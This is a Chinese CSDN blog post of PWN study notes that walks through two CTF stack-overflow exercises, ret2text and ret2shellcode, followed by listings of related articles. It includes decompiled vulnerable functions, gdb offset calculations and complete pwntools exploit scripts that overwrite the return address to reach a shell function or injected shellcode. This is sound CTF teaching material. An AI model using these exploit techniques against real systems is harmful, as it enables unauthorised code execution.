PWN学习笔记

最新推荐文章于 2024-05-02 04:22:01 发布
最新推荐文章于 2024-05-02 04:22:01 发布
阅读量492 收藏
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33624424/article/details/107784220
版权

PWN学习笔记

环境准备

  • Ubuntu 18 (Ubuntu 20 好多题目程序运行不了)
  • pwntools
  • gdb & pwndbg
  • IDA Pro

题目

ret2text

打开IDA Pro

PfUNI.png

看到一个get_shell、vulnerable、main函数。

main函数调用了vulnerable函数。

int vulnerable()
{
  char buffer[8]; // [esp+8h] [ebp-10h]

  gets(buffer);
  return 0;
}

这里只要让栈溢出后接入get_shell的地址就能调用get_shell函数了。

使用 IDA PRO 找到get_shell函数的地址:0x08048522

使用GDB调试出偏移量

Pfry1.png

0xffffcf78 - 0xffffcf68 = 16

16在加4就是偏移量

from pwn import *
context(os='linux',arch='i386',log_level='debug')
io = process("ret2text")
payload = b'a' * 20 + p32(0x08048522)
io.sendline(payload)
io.interactive()

ret2shellcode

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No system for you this time !!!");
  gets(&s);
  strncpy(buf2, &s, 0x64u);
  printf("bye bye ~");
  return 0;
}

这里将s 拷贝给buf2

首先要找到buf2的地址:0x0804A080

用 cyclic 1000 生成1000个垃圾字符

gdb ret2shellcode

run

然后输入1000个垃圾字符

PfF2m.png

cyclic -l 0x62616164

得到112

from pwn import *

context(os='linux',arch='i386',log_level='debug')
io = process("ret2shellcode")
shellcode = asm(shellcraft.i386.linux.sh())
payload = shellcode.ljust(112,'A') + p32(0x0804A080)
io.sendline(payload)
io.interactive()
skyxmao
关注
专栏目录
pwn by example学习笔记(一)
沐沐的博客
05-15 1466
通过一些例子来学习pwn,这些例子来自于github上的ctf-wiki pwn部分栈溢出原理(示例:ret2text)首先,获取要pwn的程序的基本信息这个程序是Linux下32位的elf格式的可执行文件,没有开启栈(stack)保护机制,没有开启nx了解了程序的基本信息以后,就运行下程序发现只有输入和输出,而且就只有一个输入点。放到ida里面去跑一下可以看到,gets从标准输入设备读字符串函数...
pwn学习笔记 BUU
2301_79525044的博客
01-11 586
本来配完20和22以后以为自己已经会配基本的环境了,结果18又让我看到了很多新的问题。搜出来的文章大部分都没用,找到有用的文章也忘记保存了,以后如果有缘要重新配环境应该会吃很多亏。之前一直没有做笔记,现在开始正式进入寒假学习。这Ubuntu18的问题比20和22多好多,不停的报错,报错方式不停地变,已经麻了。刚回家,一堆事要搞,没学什么,主要还是配环境。
PWN入门笔记
WuXianYo_的博客
03-10 179
PWN入门笔记
Pwn学习笔记
有头发的埼玉
11-03 170
pwn个人学习笔记
Pwn学习笔记-持续更新
MrTreebook的博客
03-03 365
Pwn学习笔记-持续更新第一节:基本命令第二节:gdb 第一节:基本命令 命令 介绍 readelf 查看elf nm hexdump 查看十六进制 strings ldd 查看库函数的位置 objdump 反编译成汇编 objdump [-d] [file] [-M] [intel] 查看intel下的汇编 gcc [-S] 直接编译成汇编代码 第二节:gdb gdb命令 介绍 i i r :查看寄存器 b 下断点 d 删除断点
pwn学习笔记(一)
qq_41560595的博客
03-18 1643
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前
arttnba3的博客
02-25 623
学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前[GITHUB BLOG ADDR](https://arttnba3.cn/2021/02/21/NOTE-0X02-LINUX-KERNEL-PWN-PART-I/)0x00.Linux Kernel Basic Knowledge一、内核内核架构:微内核 & 宏内核(单内核)宏内核(Monolithic Kernel,又叫单内核)微内核(Micro Kernel)二、分级保护域Intel Ring Model
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
PWN学习笔记(一)Basic Rop
weixin_44120526的博客
12-26 370
学习笔记主要基于CTF WIKI 中的Basic rop部分。 网址为:https://wiki.x10sec.org/pwn/linux/stackoverflow/basic-rop/ -------------------------------------------------------------------- 首先翻译了一下文章的开头,内容为: 打开NX保护后,很难继续直接将代码注入堆栈或堆中。攻击者也提出了相应的绕过保护的方法。目前最主要的是面向返回的程序设计。主要思想是基于堆栈.
PWN-汇编学习笔记
yajuanpi4899的博客
01-09 3373
目录 一、汇编和PWN的关系 二、常用知识点 三、windows下搭建debug实验环境 一、汇编和PWN的关系 PWN需要对逆向了解,调试模式中会产生大量的汇编代码解读,需要对汇编有一定的基础。本文基于《汇编语言》第四版 王爽 一书进行一定知识点的提取和总结。 二、常用知识点 8086的CPU通用寄存器均为16位,可以存放两个字节,AX,BX,CX,DX四个寄存器存一般性数据。 ah:AX高位寄存器 al:AX地位寄存器 字节(byte):8位bit,存在8位寄存器中 字(wo
PWN学习笔记--HCTF2017 pwn200
I have a dream
04-25 468
参考链接:https://bbs.pediy.com/thread-224645.htm 考点:格式化字符串、GOT覆盖 思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。 漏洞程序: 2017湖湘杯pwn200 漏洞利用程序: from pwn import ...
PWN学习笔记(1)
Jason_ZhouYetao的博客
07-16 2918
首先来说说pwn,这个水还是很深的,不过我学习pwn的原因是我觉得pwn是最接近黑客的东西,当然web也是我考虑的一个方向,但是pwn更加偏向于对代码这方面的知识,所以我也就选择了pwn这个方向。 0x1 首先pwn的最基本的东西就是c语言,一般的pwn题目都是以c代码来出的题目,所以学好c是做pwn的前提,之后还需要一定的Linux命令的基础和各种插件的使用(比如在溢出这块还是以gdb的pe...
Pwn基础知识笔记
3569
12-15 4697
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
PWN-学习笔记
小龙在线
08-23 738
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
CTF(PWN基础学习笔记)
WuXianYo_的博客
03-17 454
3.进入目标函数后,选择其中的可能出现漏洞的子函数,双击进入该函数的反编译后的C语言界面。2.找到目标函数,选择目标函数的任意代码段,F5将该函数的汇编语言一键反编译为C语言。*shift+F12,字符串表,可根据字符串查找该字符串所在函数的位置。*某些函数无C语言代码,无法反编译为C语言代码,如start()*功能键冲突(如shift+F12),可加Fn消除冲突。运行,显示出寄存器,汇编码,栈,函数关系 四栏信息。,链接本地端口展开攻击,完成后再链接远程端口。*可将C语言代码拷贝到汇编代码中进行对照。
pwn学习笔记(3)ret2syscall
qq_66013948的博客
02-13 876
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
pwn学习笔记(6)--堆基础概述
qq_66013948的博客
03-23 952
​ chunk 被释放时,glibc 会将它们重新组织起来,构成不同的 bin 链表,当用户再次申请时,就从中寻找合适的 chunk 返回用户。不同大小区间 chunk 被划分到不同的 bin 中,再加上一种特殊的 bin,一共有四种:Fast bin 、Samll bin 、 Large bin 、和 Unsorted bin。这些bin记录在 malloc_state 结构中。fastbinsY :这是一个 bin 数组,里面有 NFASTBINS 个 fast bin。
k8s学习-StatefulSet(模板、更新、扩缩容、删除等)_statefulset模板
最新发布
2401_84281594的博客
05-02 595
name: web。
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。 首先,PWN是指利用程序漏洞进行攻击的技术,通常用于渗透测试和漏洞挖掘。而英飞凌TC264是一款基于ARM Cortex-M4内核的微控制器,它的安全性取决于程序的编写...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值